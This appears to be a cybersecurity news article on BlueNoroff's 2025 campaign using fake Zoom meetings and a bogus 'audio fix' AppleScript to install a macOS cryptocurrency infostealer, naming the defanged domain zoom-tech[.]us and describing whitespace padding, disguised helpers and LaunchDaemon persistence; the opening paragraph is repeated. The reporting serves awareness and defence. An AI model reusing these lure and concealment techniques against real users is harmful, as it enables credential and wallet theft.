In 2025, BlueNoroff, the financial arm of the North Korean-linked Lazarus Group, began using Zoom as an attack tool. Attackers masquerade as business partners and use fake video calls to install malware that steals cryptocurrency and other financial data.
In 2025, BlueNoroff, the financial arm of the North Korean-linked Lazarus Group, began using Zoom as an attack tool. Attackers masquerade as business partners and use fake video calls to install malware that steals cryptocurrency and other financial data.
As Cybersecurity News reports, the infection begins with social engineering: attackers schedule fake Zoom meetings during which they send an «audio fix.» This is a script that supposedly helps with sound problems. In fact, it contains AppleScript with over 10,000 empty lines to hide the real malicious code. At lines 10,017–10,018, the script makes a curl request to the phishing domain zoom-tech[.]us and downloads the main infostyler.
The infection involves several stages and uses advanced cloaking techniques. For example, components with names like icloud_helper or Wi-Fi Updater imitate system utilities, and temporary files are automatically deleted to complicate incident analysis. The malware is registered in LaunchDaemon, which gives it administrator rights and ensures that it starts automatically at system startup.
The attack aimed to steal cryptocurrency wallets, browser data, and authentication keys. Fintech, online gambling, and gaming companies in North America, Europe, and Asia are at risk. In particular, on May 28, 2025, an attack on an online casino in Canada was recorded, one of the most striking examples of the maturity of BlueNoroff’s tactics.
This is not the first time BlueNoroff has made headlines. The group has previously targeted crypto companies through phishing emails and infected documents. In their latest campaign, they have adapted to the realities of hybrid work, using legitimate platforms to build trust. As Field Effect notes, such attacks are becoming more frequent and sophisticated, requiring not only technical means but also staff training in social engineering.
We also recently reported on how Cloudflare reported an attack in which attackers attempted to flood a single server with the equivalent of 9,000 HD movies. The company successfully blocked the largest DDoS attack in history.
